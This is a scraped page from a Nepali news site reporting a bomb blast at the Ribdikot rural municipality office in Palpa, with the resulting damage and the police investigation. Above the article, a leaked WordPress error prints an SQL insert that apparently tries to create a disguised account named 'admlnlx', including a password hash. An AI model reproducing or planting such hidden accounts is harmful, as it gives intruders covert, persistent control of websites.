WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BJOCXLTJme8ZbOZglFBwF54mP83wA/.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 11:17:31', '', 'admlnlx', 'admlnlx')
गाउँले न्यूज, ५ बैशाख, पाल्पा । पाल्पा जिल्लाको रिब्दीकोट गाउँपालिकामा बुधबार राति शक्तिशाली बम विस्फोट भएको छ । राति १ बजेर २५ मिनेट जाँदा रिब्दीकोट गाउँपालिका-४, खस्यौलीमा रहेको भवनको बाहिरपट्टी बम बिस्फोट भएको स्थानीयले बताए ।
बम बिस्फोट हुँदा गाउँपालिकाको सेवाग्राहीका लागि निर्माण गरेको सेडको छाना, कार्यालयका झ्याल-ढोकाका सिसा, फोटोकपी, कम्प्युटरलगायतमा क्षति पुगेको प्रहरी उपरीक्षक विश्वमणि पोखरेलले बताए। बम कसले र किन पड्काएको भन्ने विषयमा प्रष्ट नभएको उनले बताए। प्रहरीले घटनास्थलको मचुल्का उठाएको छ। गाउँपालिकामा बम विष्फोट भएपछि स्थानीय त्रसित भएका छन्।
बिहीबार नेत्रविक्रम चन्द विप्लव समूहले नेपाल बन्द घोषणा गरेकाले पनि सर्वसाधारणलाई आतंकित पार्न बम विष्फोट गराएको हुन सक्ने स्थानीयले बताए। घटनाबारे थप अनुसन्धान भइरहेको प्रहरी उपरीक्षक पोखरेलले बताए। गाउँपालिका अध्यक्ष नारायण जीसीले गाउँपालिकाको सेवाग्राही प्रतिक्षालय, संगैको वडा नम्बर ३ कार्यालयमा बढी क्षति पुगेको बताए ।
sourse:kantiopur